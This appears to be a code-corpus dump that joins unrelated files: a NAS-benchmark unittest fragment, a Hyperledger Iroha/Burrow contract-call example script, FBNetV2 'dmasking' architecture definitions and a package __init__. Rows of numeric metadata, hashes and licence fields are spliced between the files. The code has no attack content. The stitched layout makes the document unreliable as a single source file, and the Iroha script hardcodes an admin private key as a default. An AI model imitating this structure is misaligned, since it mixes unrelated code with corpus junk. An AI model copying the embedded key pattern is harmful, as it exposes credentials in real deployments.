        space = self.b.get_configuration_space()
        config = space.sample_configuration()
        node_ops = ('conv1x1-bn-relu', 'conv3x3-bn-relu', 'conv3x3-bn-relu',
                    'conv3x3-bn-relu', 'maxpool3x3')
        for node, op in enumerate(node_ops):
            config["op_node_%d" % node] = op
        # One slot per possible edge of the DAG; turn on exactly these nine.
        total_edges = VERTICES * (VERTICES - 1) // 2
        active_edges = {0, 1, 2, 4, 10, 14, 15, 19, 20}
        for i in range(total_edges):
            config["edge_%d" % i] = 1 if i in active_edges else 0
        config["num_edges"] = 9
        y, cost = self.b.objective_function(config, 108)
        regret = self.b.get_results()['regret_test'][0]
        mean_test_acc = 1 - (self.b.y_star_test + regret)
        assert mean_test_acc == 0.9308560291926066

    def test_random_sampling(self):
        """A randomly drawn configuration must be evaluable without error."""
        config = self.b.get_configuration_space().sample_configuration()
        self.b.objective_function(config)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 30.412214
| 85
| 0.609438
| 516
| 3,984
| 4.410853
| 0.160853
| 0.127417
| 0.082162
| 0.073814
| 0.836995
| 0.836995
| 0.836995
| 0.783392
| 0.783392
| 0.783392
| 0
| 0.070241
| 0.260291
| 3,984
| 130
| 86
| 30.646154
| 0.70207
| 0.017068
| 0
| 0.765957
| 0
| 0
| 0.150051
| 0
| 0
| 0
| 0
| 0
| 0.031915
| 1
| 0.095745
| false
| 0
| 0.031915
| 0
| 0.159574
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
898ba14cbea7d24028e7d55b03da48b15fead0cd
| 14,881
|
py
|
Python
|
example/burrow_integration/get_transactions.py
|
Insafin/iroha
|
5e3c3252b2a62fa887274bdf25547dc264c10c26
|
[
"Apache-2.0"
] | 1,467
|
2016-10-25T12:27:19.000Z
|
2022-03-28T04:32:05.000Z
|
example/burrow_integration/get_transactions.py
|
Insafin/iroha
|
5e3c3252b2a62fa887274bdf25547dc264c10c26
|
[
"Apache-2.0"
] | 2,366
|
2016-10-25T10:07:57.000Z
|
2022-03-31T22:03:24.000Z
|
example/burrow_integration/get_transactions.py
|
Insafin/iroha
|
5e3c3252b2a62fa887274bdf25547dc264c10c26
|
[
"Apache-2.0"
] | 662
|
2016-10-26T04:41:22.000Z
|
2022-03-31T04:15:02.000Z
|
import os
import binascii
from iroha import IrohaCrypto
from iroha import Iroha, IrohaGrpc
from iroha.primitive_pb2 import can_set_my_account_detail
from iroha.queries_pb2 import *
import sys
from Crypto.Hash import keccak
import integration_helpers
import json
# Fail fast on Python 2 — the client code below requires Python 3.
if sys.version_info[0] < 3:
    raise Exception("Python 3 or a more recent version is required.")

# Here is the information about the environment and admin account information:
IROHA_HOST_ADDR = os.getenv("IROHA_HOST_ADDR", "127.0.0.1")
IROHA_PORT = os.getenv("IROHA_PORT", "50051")
ADMIN_ACCOUNT_ID = os.getenv("ADMIN_ACCOUNT_ID", "admin@test")
ADMIN_PRIVATE_KEY = os.getenv(
    "ADMIN_PRIVATE_KEY",
    "f101537e319568c765b2cc89698325604991dca57b9716b58016b253506cab70",
)
# Asset id used by the sample transactions below.
COIN = 'coin#test'

# Client bound to the admin account, and a gRPC channel to the Iroha peer.
iroha = Iroha(ADMIN_ACCOUNT_ID)
net = IrohaGrpc("{}:{}".format(IROHA_HOST_ADDR, IROHA_PORT))

# Throwaway keypair; appears unused in the rest of this script — TODO confirm.
test_private_key = IrohaCrypto.private_key()
test_public_key = IrohaCrypto.derive_public_key(test_private_key).decode("utf-8")
@integration_helpers.trace
def send_transaction_and_print_status(transaction):
    """Sign *transaction* with the admin key, submit it, print every status
    update the peer streams back, and return the transaction's hex hash."""
    IrohaCrypto.sign_transaction(transaction, ADMIN_PRIVATE_KEY)
    hex_hash = binascii.hexlify(IrohaCrypto.hash(transaction))
    print('Transaction hash = {}, creator = {}'.format(
        hex_hash, transaction.payload.reduced_payload.creator_account_id))
    response = net.send_tx(transaction)
    print(response)
    # Consume the peer's status stream for this transaction, printing each update.
    for status in net.tx_status_stream(transaction):
        print(status)
    return hex_hash
@integration_helpers.trace
def create_contract():
bytecode = "608060405234801561001057600080fd5b5073a6abc17819738299b3b2c1ce46d55c74f04e290c6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506111dd806100746000396000f3fe608060405234801561001057600080fd5b50600436106100575760003560e01c806353b676e71461005c578063ae44f0c21461008c578063bf010d56146100bc578063d4e804ab146100ec578063d8f7441a1461010a575b600080fd5b610076600480360381019061007191906107b7565b61013a565b6040516100839190610d6a565b60405180910390f35b6100a660048036038101906100a19190610800565b6102a6565b6040516100b39190610d6a565b60405180910390f35b6100d660048036038101906100d19190610907565b61041e565b6040516100e39190610d6a565b60405180910390f35b6100f461059f565b6040516101019190610d4f565b60405180910390f35b610124600480360381019061011f9190610a9d565b6105c3565b6040516101319190610d6a565b60405180910390f35b606060008260405160240161014f9190610d8c565b6040516020818303038152906040527f53b676e7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060008060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16836040516102169190610d38565b600060405180830381855af49150503d8060008114610251576040519150601f19603f3d011682016040523d82523d6000602084013e610256565b606091505b50915091508161029b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161029290610fa6565b60405180910390fd5b809350505050919050565b6060600086868686866040516024016102c3959493929190610dae565b6040516020818303038152906040527fae44f0c2000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060008060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffff
ffffffffffffffffffffffffffff168360405161038a9190610d38565b600060405180830381855af49150503d80600081146103c5576040519150601f19603f3d011682016040523d82523d6000602084013e6103ca565b606091505b50915091508161040f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161040690610fa6565b60405180910390fd5b80935050505095945050505050565b606060008989898989898989604051602401610441989796959493929190610e24565b6040516020818303038152906040527fbf010d56000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060008060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16836040516105089190610d38565b600060405180830381855af49150503d8060008114610543576040519150601f19603f3d011682016040523d82523d6000602084013e610548565b606091505b50915091508161058d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058490610fa6565b60405180910390fd5b80935050505098975050505050505050565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060008a8a8a8a8a8a8a8a8a6040516024016105e899989796959493929190610eda565b6040516020818303038152906040527fd8f7441a000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19166020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050905060008060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16836040516106af9190610d38565b600060405180830381855af49150503d80600081146106ea576040519150601f19603f3d011682016040523d82523d6000602084013e6106ef565b606091505b509150915081610734576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161072b90610fa6565b60405180910390fd5b8093505050509998505050505050505050565b600061075a61075584610feb565b
610fc6565b90508281526020810184848401111561077657610775611138565b5b610781848285611091565b509392505050565b600082601f83011261079e5761079d611133565b5b81356107ae848260208601610747565b91505092915050565b6000602082840312156107cd576107cc611142565b5b600082013567ffffffffffffffff8111156107eb576107ea61113d565b5b6107f784828501610789565b91505092915050565b600080600080600060a0868803121561081c5761081b611142565b5b600086013567ffffffffffffffff81111561083a5761083961113d565b5b61084688828901610789565b955050602086013567ffffffffffffffff8111156108675761086661113d565b5b61087388828901610789565b945050604086013567ffffffffffffffff8111156108945761089361113d565b5b6108a088828901610789565b935050606086013567ffffffffffffffff8111156108c1576108c061113d565b5b6108cd88828901610789565b925050608086013567ffffffffffffffff8111156108ee576108ed61113d565b5b6108fa88828901610789565b9150509295509295909350565b600080600080600080600080610100898b03121561092857610927611142565b5b600089013567ffffffffffffffff8111156109465761094561113d565b5b6109528b828c01610789565b985050602089013567ffffffffffffffff8111156109735761097261113d565b5b61097f8b828c01610789565b975050604089013567ffffffffffffffff8111156109a05761099f61113d565b5b6109ac8b828c01610789565b965050606089013567ffffffffffffffff8111156109cd576109cc61113d565b5b6109d98b828c01610789565b955050608089013567ffffffffffffffff8111156109fa576109f961113d565b5b610a068b828c01610789565b94505060a089013567ffffffffffffffff811115610a2757610a2661113d565b5b610a338b828c01610789565b93505060c089013567ffffffffffffffff811115610a5457610a5361113d565b5b610a608b828c01610789565b92505060e089013567ffffffffffffffff811115610a8157610a8061113d565b5b610a8d8b828c01610789565b9150509295985092959890939650565b60008060008060008060008060006101208a8c031215610ac057610abf611142565b5b60008a013567ffffffffffffffff811115610ade57610add61113d565b5b610aea8c828d01610789565b99505060208a013567ffffffffffffffff811115610b0b57610b0a61113d565b5b610b178c828d01610789565b98505060408a013567ffffffffffffffff811115610b3857610b3761113d565b5b610b448c82
8d01610789565b97505060608a013567ffffffffffffffff811115610b6557610b6461113d565b5b610b718c828d01610789565b96505060808a013567ffffffffffffffff811115610b9257610b9161113d565b5b610b9e8c828d01610789565b95505060a08a013567ffffffffffffffff811115610bbf57610bbe61113d565b5b610bcb8c828d01610789565b94505060c08a013567ffffffffffffffff811115610bec57610beb61113d565b5b610bf88c828d01610789565b93505060e08a013567ffffffffffffffff811115610c1957610c1861113d565b5b610c258c828d01610789565b9250506101008a013567ffffffffffffffff811115610c4757610c4661113d565b5b610c538c828d01610789565b9150509295985092959850929598565b610c6c8161105f565b82525050565b6000610c7d8261101c565b610c878185611032565b9350610c978185602086016110a0565b610ca081611147565b840191505092915050565b6000610cb68261101c565b610cc08185611043565b9350610cd08185602086016110a0565b80840191505092915050565b6000610ce782611027565b610cf1818561104e565b9350610d018185602086016110a0565b610d0a81611147565b840191505092915050565b6000610d2260278361104e565b9150610d2d82611158565b604082019050919050565b6000610d448284610cab565b915081905092915050565b6000602082019050610d646000830184610c63565b92915050565b60006020820190508181036000830152610d848184610c72565b905092915050565b60006020820190508181036000830152610da68184610cdc565b905092915050565b600060a0820190508181036000830152610dc88188610cdc565b90508181036020830152610ddc8187610cdc565b90508181036040830152610df08186610cdc565b90508181036060830152610e048185610cdc565b90508181036080830152610e188184610cdc565b90509695505050505050565b6000610100820190508181036000830152610e3f818b610cdc565b90508181036020830152610e53818a610cdc565b90508181036040830152610e678189610cdc565b90508181036060830152610e7b8188610cdc565b90508181036080830152610e8f8187610cdc565b905081810360a0830152610ea38186610cdc565b905081810360c0830152610eb78185610cdc565b905081810360e0830152610ecb8184610cdc565b90509998505050505050505050565b6000610120820190508181036000830152610ef5818c610cdc565b90508181036020830152610f09818b610cdc565b90508181036040830152610f1d818a610cdc565b9050818103606083
0152610f318189610cdc565b90508181036080830152610f458188610cdc565b905081810360a0830152610f598187610cdc565b905081810360c0830152610f6d8186610cdc565b905081810360e0830152610f818185610cdc565b9050818103610100830152610f968184610cdc565b90509a9950505050505050505050565b60006020820190508181036000830152610fbf81610d15565b9050919050565b6000610fd0610fe1565b9050610fdc82826110d3565b919050565b6000604051905090565b600067ffffffffffffffff82111561100657611005611104565b5b61100f82611147565b9050602081019050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600081905092915050565b600082825260208201905092915050565b600061106a82611071565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b82818337600083830152505050565b60005b838110156110be5780820151818401526020810190506110a3565b838111156110cd576000848401525b50505050565b6110dc82611147565b810181811067ffffffffffffffff821117156110fb576110fa611104565b5b80604052505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4572726f722063616c6c696e67207365727669636520636f6e7472616374206660008201527f756e6374696f6e0000000000000000000000000000000000000000000000000060208201525056fea26469706673582212205e584d5874226b894bcbcd685c22e9010a188385180559c526ec96dc806b313264736f6c63430008070033"
"""Bytecode was generated using remix editor https://remix.ethereum.org/ from file get_transactions.sol. """
tx = iroha.transaction(
[iroha.command("CallEngine", caller = ADMIN_ACCOUNT_ID, input = bytecode)]
)
return send_transaction_and_print_status(tx)
@integration_helpers.trace
def get_account_transactions(address, first_tx_height = None, last_tx_height = None, ordering_str = None):
    """Invoke the getAccountTransactions service-contract method at *address*.

    The EVM call data is assembled by hand from the helpers: the 4-byte keccak
    selector, one left-padded offset word per string parameter, then the eight
    encoded string arguments. Returns the hex hash of the submitted
    CallEngine transaction.
    """
    params = integration_helpers.get_first_four_bytes_of_keccak(b'getAccountTransactions(string,string,string,string,string,string,string,string)')
    no_of_param = 8
    for x in range(no_of_param):
        params = params + integration_helpers.left_padded_address_of_param(x, no_of_param)
    params = params + integration_helpers.argument_encoding(ADMIN_ACCOUNT_ID)  # account id
    params = params + integration_helpers.argument_encoding('1')  # page size
    params = params + integration_helpers.argument_encoding('')  # first_tx_hash
    params = params + integration_helpers.argument_encoding('')  # first_tx_time
    params = params + integration_helpers.argument_encoding('')  # last_tx_time
    # NOTE(review): str(None) encodes the literal string "None" when the heights
    # are omitted — presumably the contract treats that as "unset"; confirm.
    params = params + integration_helpers.argument_encoding(str(first_tx_height))  # first_tx_height
    params = params + integration_helpers.argument_encoding(str(last_tx_height))  # last_tx_height
    params = params + integration_helpers.argument_encoding(ordering_str)  # ordering
    tx = iroha.transaction(
        [
            iroha.command(
                "CallEngine", caller=ADMIN_ACCOUNT_ID, callee = address, input = params
            )
        ]
    )
    return send_transaction_and_print_status(tx)
# Consistency fix: every other helper in this file is wrapped in
# @integration_helpers.trace; this one was missing the decorator.
@integration_helpers.trace
def get_transactions(address, txs_hashes):
    """Invoke the getTransactions(string) service-contract method at *address*.

    *txs_hashes* is a JSON-encoded list of transaction hashes (see the caller).
    Returns the hex hash of the submitted CallEngine transaction.
    """
    params = integration_helpers.get_first_four_bytes_of_keccak(b'getTransactions(string)')
    no_of_param = 1
    for x in range(no_of_param):
        params = params + integration_helpers.left_padded_address_of_param(x, no_of_param)
    params = params + integration_helpers.argument_encoding(txs_hashes)  # tx hashes
    tx = iroha.transaction(
        [
            iroha.command(
                "CallEngine", caller=ADMIN_ACCOUNT_ID, callee = address, input = params
            )
        ]
    )
    return send_transaction_and_print_status(tx)
@integration_helpers.trace
def make_initial_transactions():
    """Seed the ledger with sample transactions for the query examples below.

    Commits four AddAssetQuantity transactions, submits one with quorum=8
    (left pending — presumably the admin cannot satisfy that quorum; confirm),
    then transfers assets to test@test.

    Returns (transfer_tx_hex_hash, first_time, last_time, first_time_pending,
    last_time_pending), where each *_time pair brackets (+/-1) the created_time
    of the last committed tx / the pending tx respectively.
    """
    for i in range(4):
        tx = iroha.transaction([
            iroha.command('AddAssetQuantity',
                          asset_id = COIN, amount = '1000.00')
        ])
        send_transaction_and_print_status(tx)
    # pending transaction
    tx1 = iroha.transaction([
        iroha.command('AddAssetQuantity',
                      asset_id = COIN, amount = '1000.00')
    ],quorum=8)
    send_transaction_and_print_status(tx1)
    # `tx` leaks out of the loop above: this is the last committed transaction.
    tx_tms = tx.payload.reduced_payload.created_time
    first_time, last_time = tx_tms - 1, tx_tms + 1
    first_time_pending = tx1.payload.reduced_payload.created_time-1
    last_time_pending = tx1.payload.reduced_payload.created_time+1
    # transfer assets
    # NOTE(review): tx1 is rebound here, discarding the pending-tx handle.
    tx1 = iroha.transaction([
        iroha.command('TransferAsset', src_account_id = ADMIN_ACCOUNT_ID,
                      dest_account_id = 'test@test', asset_id = COIN,
                      amount = '1000.00')
    ])
    hex_hash = send_transaction_and_print_status(tx1)
    return hex_hash, first_time, last_time, first_time_pending, last_time_pending
# Seed the ledger and keep the hex hash of the transfer transaction.
tx_hash, first_time, last_time, ft_p, lt_p = make_initial_transactions()
# Deploy the query contract, then resolve the engine address it was stored at.
hash = create_contract()  # NOTE(review): `hash` shadows the builtin of the same name
address = integration_helpers.get_engine_receipts_address(hash)
print('get account transactions results: ')
# Query heights 4..5, newest first (by created time, then position).
hash = get_account_transactions(address, 4, 5, '[{"Field": "kCreatedTime", "Direction": "kDescending"},{"Field": "kPosition", "Direction": "kDescending"}]')
integration_helpers.get_engine_receipts_result(hash)
print('get transactions result')
# Look up the transfer transaction by its hash (JSON-encoded list of hashes).
tx_hashes = json.dumps([tx_hash.decode()])
hash = get_transactions(address, tx_hashes)
integration_helpers.get_engine_receipts_result(hash)
print('done')
| 119.048
| 9,395
| 0.901485
| 692
| 14,881
| 19.057803
| 0.236994
| 0.028662
| 0.023658
| 0.025023
| 0.135502
| 0.122308
| 0.109873
| 0.105778
| 0.074234
| 0.067106
| 0
| 0.522918
| 0.063168
| 14,881
| 125
| 9,396
| 119.048
| 0.423069
| 0.015053
| 0
| 0.274336
| 0
| 0.00885
| 0.687878
| 0.658228
| 0
| 1
| 0
| 0
| 0
| 1
| 0.044248
| false
| 0
| 0.088496
| 0
| 0.176991
| 0.115044
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89bc29a2c78c3b4915df7a11c68cc9ed23c43e32
| 7,814
|
py
|
Python
|
models/imagenet/arch/fbnet_v2/fbnet_modeldef_cls_dmasking.py
|
a1004123217/pytorch-mobile
|
97974af3259a2073efbc334d57841efbd3eaadfb
|
[
"MIT"
] | null | null | null |
models/imagenet/arch/fbnet_v2/fbnet_modeldef_cls_dmasking.py
|
a1004123217/pytorch-mobile
|
97974af3259a2073efbc334d57841efbd3eaadfb
|
[
"MIT"
] | null | null | null |
models/imagenet/arch/fbnet_v2/fbnet_modeldef_cls_dmasking.py
|
a1004123217/pytorch-mobile
|
97974af3259a2073efbc334d57841efbd3eaadfb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .fbnet_modeldef_cls import MODEL_ARCH
from .modeldef_utils import _ex, e1, e6
# No extra architecture-wide arguments for these models.
BASIC_ARGS = {}
# Inverted-residual config shared by every block below: squeeze-excite
# layers keep their full channel count ("less_se_channels" disabled).
IRF_CFG = {"less_se_channels": False}
# FBNetV2 "dmasking" classification architectures, keyed by model name.
# Each entry gives the expected input resolution and the per-stage block
# table; rows follow the [op_name, c, s, n, ...] convention noted below
# (c = output channels, s = stride, n = repeat count). The _ex(...) values
# are presumably per-block expansion ratios found by the search —
# NOTE(review): confirm against modeldef_utils._ex.
MODEL_ARCH_DMASKING_NET = {
    "dmasking_f1": {
        # nparams: 5.998952, nflops 55.747008
        "input_size": 128,
        "basic_args": BASIC_ARGS,
        "blocks": [
            # [c, s, n, ...]
            # stage 0
            [["conv_k3_hs", 8, 2, 1]],
            # stage 1
            [["ir_k5", 8, 1, 1, e1, IRF_CFG]],
            # stage 2
            [
                ["ir_k5", 24, 2, 1, _ex(5.4566), IRF_CFG],
                ["ir_k5", 24, 1, 1, _ex(4.7912), IRF_CFG],
            ],
            # stage 3
            [
                ["ir_k5_sehsig", 32, 2, 1, _ex(5.3501), IRF_CFG],
                ["ir_k5_sehsig", 24, 1, 1, _ex(4.5379), IRF_CFG],
            ],
            # stage 4
            [
                ["ir_k5_hs", 56, 2, 1, _ex(5.7133), IRF_CFG],
                ["ir_k3_hs", 56, 1, 1, _ex(4.1212), IRF_CFG],
                ["ir_k3_sehsig_hs", 56, 1, 1, _ex(5.1246), IRF_CFG],
                ["skip", 80, 1, 1, _ex(5.0333), IRF_CFG],
                ["ir_k5_sehsig_hs", 80, 1, 1, _ex(4.5070), IRF_CFG],
                ["ir_k5_sehsig_hs", 80, 1, 1, _ex(1.7712), IRF_CFG],
            ],
            # stage 5
            [
                ["ir_k3_sehsig_hs", 144, 2, 1, _ex(4.5685), IRF_CFG],
                ["ir_k5_sehsig_hs", 144, 1, 1, _ex(5.8400), IRF_CFG],
                ["ir_k5_sehsig_hs", 144, 1, 1, _ex(6.8754), IRF_CFG],
                ["skip", 224, 1, 1, _ex(6.5245), IRF_CFG],
            ],
            # stage 6
            [["ir_pool_hs", 1600, 1, 1, e6]],
        ],
    },
    "dmasking_f4": {
        # nparams: 6.993656, nflops 234.689136
        "input_size": 224,
        "basic_args": BASIC_ARGS,
        "blocks": [
            # [c, s, n, ...]
            # stage 0
            [["conv_k3_hs", 16, 2, 1]],
            # stage 1
            [["ir_k3", 16, 1, 1, e1, IRF_CFG]],
            # stage 2
            [
                ["ir_k5", 24, 2, 1, _ex(5.4566), IRF_CFG],
                ["ir_k5", 24, 1, 1, _ex(1.7912), IRF_CFG],
                ["ir_k5", 24, 1, 1, _ex(1.7912), IRF_CFG],
            ],
            # stage 3
            [
                ["ir_k5_sehsig", 32, 2, 1, _ex(5.3501), IRF_CFG],
                ["ir_k5_sehsig", 32, 1, 1, _ex(3.5379), IRF_CFG],
                ["ir_k5_sehsig", 32, 1, 1, _ex(4.5379), IRF_CFG],
                ["ir_k5_sehsig", 32, 1, 1, _ex(4.5379), IRF_CFG],
            ],
            # stage 4
            [
                ["ir_k5_hs", 64, 2, 1, _ex(5.7133), IRF_CFG],
                ["ir_k3_hs", 64, 1, 1, _ex(2.1212), IRF_CFG],
                ["skip", 64, 1, 1, _ex(3.1246), IRF_CFG],
                ["ir_k3_hs", 104, 1, 1, _ex(5.0333), IRF_CFG],
                ["ir_k5_sehsig_hs", 104, 1, 1, _ex(2.5070), IRF_CFG],
                ["ir_k5_sehsig_hs", 104, 1, 1, _ex(1.7712), IRF_CFG],
                ["ir_k5_sehsig_hs", 112, 1, 1, _ex(3.7712), IRF_CFG],
            ],
            # stage 5
            [
                ["ir_k3_sehsig_hs", 184, 2, 1, _ex(5.5685), IRF_CFG],
                ["ir_k5_sehsig_hs", 184, 1, 1, _ex(2.8400), IRF_CFG],
                ["ir_k5_sehsig_hs", 184, 1, 1, _ex(4.8754), IRF_CFG],
                ["skip", 224, 1, 1, _ex(6.5245), IRF_CFG],
            ],
            # stage 6
            [["ir_pool_hs", 1984, 1, 1, e6]],
        ],
    },
    "dmasking_l2_hs": {
        # nparams: 8.49 nflops: 422.04
        "input_size": 256,
        "basic_args": BASIC_ARGS,
        "blocks": [
            # [c, s, n, ...]
            # stage 0
            [["conv_k3_hs", 16, 2, 1]],
            # stage 1
            [["ir_k3_hs", 16, 1, 1, e1, IRF_CFG]],
            # stage 2
            [
                ["ir_k5_hs", 24, 2, 1, _ex(5.4566), IRF_CFG],
                ["ir_k5_hs", 24, 1, 1, _ex(1.7912), IRF_CFG],
                ["ir_k3_hs", 24, 1, 1, _ex(1.7912), IRF_CFG],
                ["ir_k5_hs", 24, 1, 1, _ex(1.7912), IRF_CFG],
            ],
            # stage 3
            [
                ["ir_k5_sehsig", 40, 2, 1, _ex(5.3501), IRF_CFG],
                ["ir_k5_sehsig", 32, 1, 1, _ex(3.5379), IRF_CFG],
                ["ir_k5_sehsig", 32, 1, 1, _ex(4.5379), IRF_CFG],
                ["ir_k5_sehsig", 32, 1, 1, _ex(4.5379), IRF_CFG],
            ],
            # stage 4
            [
                ["ir_k5_hs", 64, 2, 1, _ex(5.7133), IRF_CFG],
                ["ir_k3_hs", 64, 1, 1, _ex(2.1212), IRF_CFG],
                ["skip", 64, 1, 1, _ex(3.1246), IRF_CFG],
                ["ir_k3_hs", 64, 1, 1, _ex(3.1246), IRF_CFG],
                ["ir_k3_hs", 112, 1, 1, _ex(5.0333), IRF_CFG],
                ["ir_k5_sehsig_hs", 112, 1, 1, _ex(2.5070), IRF_CFG],
                ["ir_k5_sehsig_hs", 112, 1, 1, _ex(1.7712), IRF_CFG],
                ["ir_k5_sehsig_hs", 112, 1, 1, _ex(2.7712), IRF_CFG],
                ["ir_k5_sehsig_hs", 112, 1, 1, _ex(3.7712), IRF_CFG],
                ["ir_k5_sehsig_hs", 112, 1, 1, _ex(3.7712), IRF_CFG],
            ],
            # stage 5
            [
                ["ir_k3_sehsig_hs", 184, 2, 1, _ex(5.5685), IRF_CFG],
                ["ir_k5_sehsig_hs", 184, 1, 1, _ex(2.8400), IRF_CFG],
                ["ir_k5_sehsig_hs", 184, 1, 1, _ex(2.8400), IRF_CFG],
                ["ir_k5_sehsig_hs", 184, 1, 1, _ex(4.8754), IRF_CFG],
                ["ir_k5_sehsig_hs", 184, 1, 1, _ex(4.8754), IRF_CFG],
                ["skip", 224, 1, 1, _ex(6.5245), IRF_CFG],
            ],
            # stage 6
            [["ir_pool_hs", 1984, 1, 1, e6]],
        ],
    },
    "dmasking_l3": {
        # nparams: 9.402096, nflops 750.681952
        "input_size": 288,
        "basic_args": BASIC_ARGS,
        "blocks": [
            # [c, s, n, ...]
            # stage 0
            [["conv_k3_hs", 24, 2, 1]],
            # stage 1
            [["ir_k3", 24, 1, 1, e1, IRF_CFG]],
            # stage 2
            [
                ["ir_k5", 32, 2, 1, _ex(5.4566), IRF_CFG],
                ["ir_k5", 32, 1, 1, _ex(1.7912), IRF_CFG],
                ["ir_k3", 32, 1, 1, _ex(1.7912), IRF_CFG],
                ["ir_k5", 32, 1, 1, _ex(1.7912), IRF_CFG],
            ],
            # stage 3
            [
                ["ir_k5_sehsig", 48, 2, 1, _ex(5.3501), IRF_CFG],
                ["ir_k5_sehsig", 40, 1, 1, _ex(3.5379), IRF_CFG],
                ["ir_k5_sehsig", 40, 1, 1, _ex(4.5379), IRF_CFG],
                ["ir_k5_sehsig", 40, 1, 1, _ex(4.5379), IRF_CFG],
            ],
            # stage 4
            [
                ["ir_k5_hs", 72, 2, 1, _ex(5.7133), IRF_CFG],
                ["ir_k3_hs", 72, 1, 1, _ex(2.1212), IRF_CFG],
                ["skip", 72, 1, 1, _ex(3.1246), IRF_CFG],
                ["ir_k3_hs", 72, 1, 1, _ex(3.1246), IRF_CFG],
                ["ir_k3_hs", 120, 1, 1, _ex(5.0333), IRF_CFG],
                ["ir_k5_sehsig_hs", 120, 1, 1, _ex(2.5070), IRF_CFG],
                ["ir_k5_sehsig_hs", 120, 1, 1, _ex(1.7712), IRF_CFG],
                ["ir_k5_sehsig_hs", 120, 1, 1, _ex(2.7712), IRF_CFG],
                ["ir_k5_sehsig_hs", 120, 1, 1, _ex(3.7712), IRF_CFG],
                ["ir_k5_sehsig_hs", 120, 1, 1, _ex(3.7712), IRF_CFG],
                ["ir_k5_sehsig_hs", 120, 1, 1, _ex(3.7712), IRF_CFG],
            ],
            # stage 5
            [
                ["ir_k3_sehsig_hs", 192, 2, 1, _ex(5.5685), IRF_CFG],
                ["ir_k5_sehsig_hs", 192, 1, 1, _ex(2.8400), IRF_CFG],
                ["ir_k5_sehsig_hs", 192, 1, 1, _ex(2.8400), IRF_CFG],
                ["ir_k5_sehsig_hs", 192, 1, 1, _ex(4.8754), IRF_CFG],
                ["ir_k5_sehsig_hs", 192, 1, 1, _ex(4.8754), IRF_CFG],
                ["skip", 240, 1, 1, _ex(6.5245), IRF_CFG],
            ],
            # stage 6
            [["ir_pool_hs", 1984, 1, 1, e6]],
        ],
    },
}
# Publish these architectures into the shared registry so they can be looked
# up by name alongside the other fbnet classification model definitions.
MODEL_ARCH.register_dict(MODEL_ARCH_DMASKING_NET)
| 40.910995
| 70
| 0.42795
| 1,148
| 7,814
| 2.5723
| 0.099303
| 0.174738
| 0.088046
| 0.162547
| 0.838469
| 0.818151
| 0.789705
| 0.785303
| 0.768033
| 0.740264
| 0
| 0.211146
| 0.391477
| 7,814
| 190
| 71
| 41.126316
| 0.409884
| 0.056565
| 0
| 0.5
| 0
| 0
| 0.156088
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012821
| 0
| 0.012821
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7f5183a9881a94d6ca082e7c0b6b78e673ef8516
| 73
|
py
|
Python
|
device/controller/__init__.py
|
ZJU-Robotics-Lab/CICT
|
ff873a03ab03d9113b8db96d26246939bb5da0d4
|
[
"MIT"
] | 12
|
2021-02-09T05:08:36.000Z
|
2022-02-24T07:51:30.000Z
|
device/controller/__init__.py
|
ZJU-Robotics-Lab/CICT
|
ff873a03ab03d9113b8db96d26246939bb5da0d4
|
[
"MIT"
] | null | null | null |
device/controller/__init__.py
|
ZJU-Robotics-Lab/CICT
|
ff873a03ab03d9113b8db96d26246939bb5da0d4
|
[
"MIT"
] | 6
|
2021-03-30T06:30:13.000Z
|
2022-03-01T14:15:00.000Z
|
from .controller import *
from .xbox import *
from .passive_xbox import *
| 24.333333
| 27
| 0.767123
| 10
| 73
| 5.5
| 0.5
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150685
